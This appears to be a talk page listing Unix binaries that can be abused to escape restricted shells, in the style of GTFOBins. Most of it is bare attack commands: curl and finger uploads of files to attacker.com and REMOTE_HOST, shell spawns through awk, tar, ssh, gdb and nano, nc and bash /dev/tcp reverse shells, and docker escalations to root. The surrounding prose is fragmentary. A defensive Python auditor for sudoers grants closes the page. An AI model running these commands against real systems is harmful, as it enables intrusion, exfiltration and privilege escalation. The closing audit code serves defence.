Lightning DTalks by DareCode
Get the f**k Out binaries
List of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
Restricted shells are, conceptually, shells with reduced permissions: their features and commands work in a very particular environment, built to keep users in a secure and controlled space and to allow them just the minimum necessary to perform their daily operations.
Linux administrators generally need to provide a local or remote shell to other users, or to other administrators, for daily routine management and support procedures. That is why it is extremely important to restrict these shells' features to the minimum necessary for those activities, but sometimes that is just not enough to keep hackers out, as you will soon see.
awk '//' "file_to_read"
awk -v LFILE=file_to_write 'BEGIN { print "DATA" > LFILE }'
base64 "file_to_read" | base64 --decode
curl file://path/to/file/to/read
curl http://attacker.com/file_to_get -o file
curl -X POST -d @file_to_send http://attacker.com/post_data_handler
date -f file_to_read
date: invalid date '<entry>'
date: invalid date ' <id>tag:drupal,comment-41</id>'
date: invalid date ' <published>2006-06-27T18:14:18+02:00</published>'
...
diff --line-format=%L /dev/null file_to_read
finger x@REMOTE_HOST | base64 -d > "dest_file"
finger "$(base64 file_to_send)@REMOTE_HOST"
Thug life!
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
aria2c --on-download-error=$TF http://x
aria2c --allow-overwrite \
  --gid=aaaaaaaaaaaaaaaa \
  --on-download-complete=bash \
  http://attacker.com/aaaaaaaaaaaaaaaa
The gid is passed as a parameter to the on-download-complete command, so "bash aaaaaaaaaaaaaaaa" is run (that is, your script).
crontab -e
awk 'BEGIN {system("/bin/sh")}'
find . -exec /bin/sh \; -quit
ftp
!/bin/sh
gdb -nx -ex '!sh' -ex quit
!sh
TF=$(mktemp)
echo "From nobody@localhost $(date)" > $TF
mail -f $TF
!/bin/sh
make --eval=$'x:\n\t-'"/bin/sh"
node -e 'require("child_process").spawn(
"/bin/sh",
{stdio: [0, 1, 2]});'
python -c 'import os; os.system("/bin/sh")'
CMD="/bin/sh" php -r 'system(getenv("CMD"));'
mysql -e '\! /bin/sh'
sqlite3 /dev/null '.shell /bin/sh'
tar -cf /dev/null /dev/null \
--checkpoint=1 \
--checkpoint-action=exec=/bin/sh
/usr/bin/time /bin/sh
rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
ssh -o ProxyCommand=';sh 0<&2 1>&2' x
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
scp -S $TF x y:
rpm --eval '%{lua:posix.exec("/bin/sh")}'
rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
zip temp.zip /etc/hosts -T -TT 'sh #'
TF=$(mktemp)
echo 'exec sh' > $TF
chmod +x $TF
nano -s $TF /etc/hosts
^T
nano -s "sh -c sh" /etc/hosts
nc -e /bin/sh REMOTE_HOST REMOTE_PORT
nc -l -p 12345 -e /bin/sh
RHOST=attacker.com
RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
export RHOST=attacker.com
export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
Why?
An attacker could point a symlink at a SetUID script and, between steps 1 and 3, change where the symlink points.
sudo docker run --rm \
  -v /home/$USER:/h_docs ubuntu \
  sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' \
  && ~/sh -p
sudo docker run --rm -ti -v /:/mnt \
-v /proc:/mnt/proc \
-v /sys:/mnt/sys \
alpine chroot /mnt
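As an added defender-side check (example code written for this page, not part of the talk or of GTFOBins): the binaries listed above are also the ones to look for when auditing what a restricted shell's allowed-command directory exposes and what sudo grants, since a binary that spawns a shell does the same when run through sudo. The sudoers sample below is constructed, and the parser handles only plain user specifications, not aliases or includes.

```python
import re
from pathlib import Path

# Binaries the slides list as restricted-shell escapes (names taken from the talk).
SHELL_ESCAPE_BINS = frozenset({
    "awk", "base64", "curl", "date", "diff", "finger", "aria2c", "crontab",
    "find", "ftp", "gdb", "mail", "make", "node", "python", "php", "mysql",
    "sqlite3", "tar", "time", "rsync", "ssh", "scp", "rpm", "rpmquery", "zip",
    "nano", "nc", "bash", "docker",
})

# sudoers user specification: who host = (runas) [TAG:]* cmd[, cmd...]
_SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\([^)]*\)\s*)?"
    r"(?:[A-Z]+:\s*)*(?P<cmds>.+)$"
)
_SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

def escape_capable(names):
    """Names (e.g. a restricted shell's allowed-command dir) that the slides list as escapes."""
    return sorted(n for n in set(names) if n in SHELL_ESCAPE_BINS)

def audit_sudoers(text):
    """(who, command) pairs whose sudo grant points at an escape-capable binary (by basename)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(_SKIP):
            continue
        m = _SPEC.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd == "ALL" or cmd.startswith("!"):  # "!cmd" is a denial, not a grant
                continue
            if Path(cmd.split()[0]).name in SHELL_ESCAPE_BINS:
                findings.append((m.group("who"), cmd))
    return findings

# Constructed sample sudoers content, not taken from any real host.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
ops     ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/tar
deploy  ALL=(root) /usr/bin/docker
"""
```

Run `audit_sudoers(SAMPLE_SUDOERS)` to see the backup and deploy grants flagged while the systemctl grant passes.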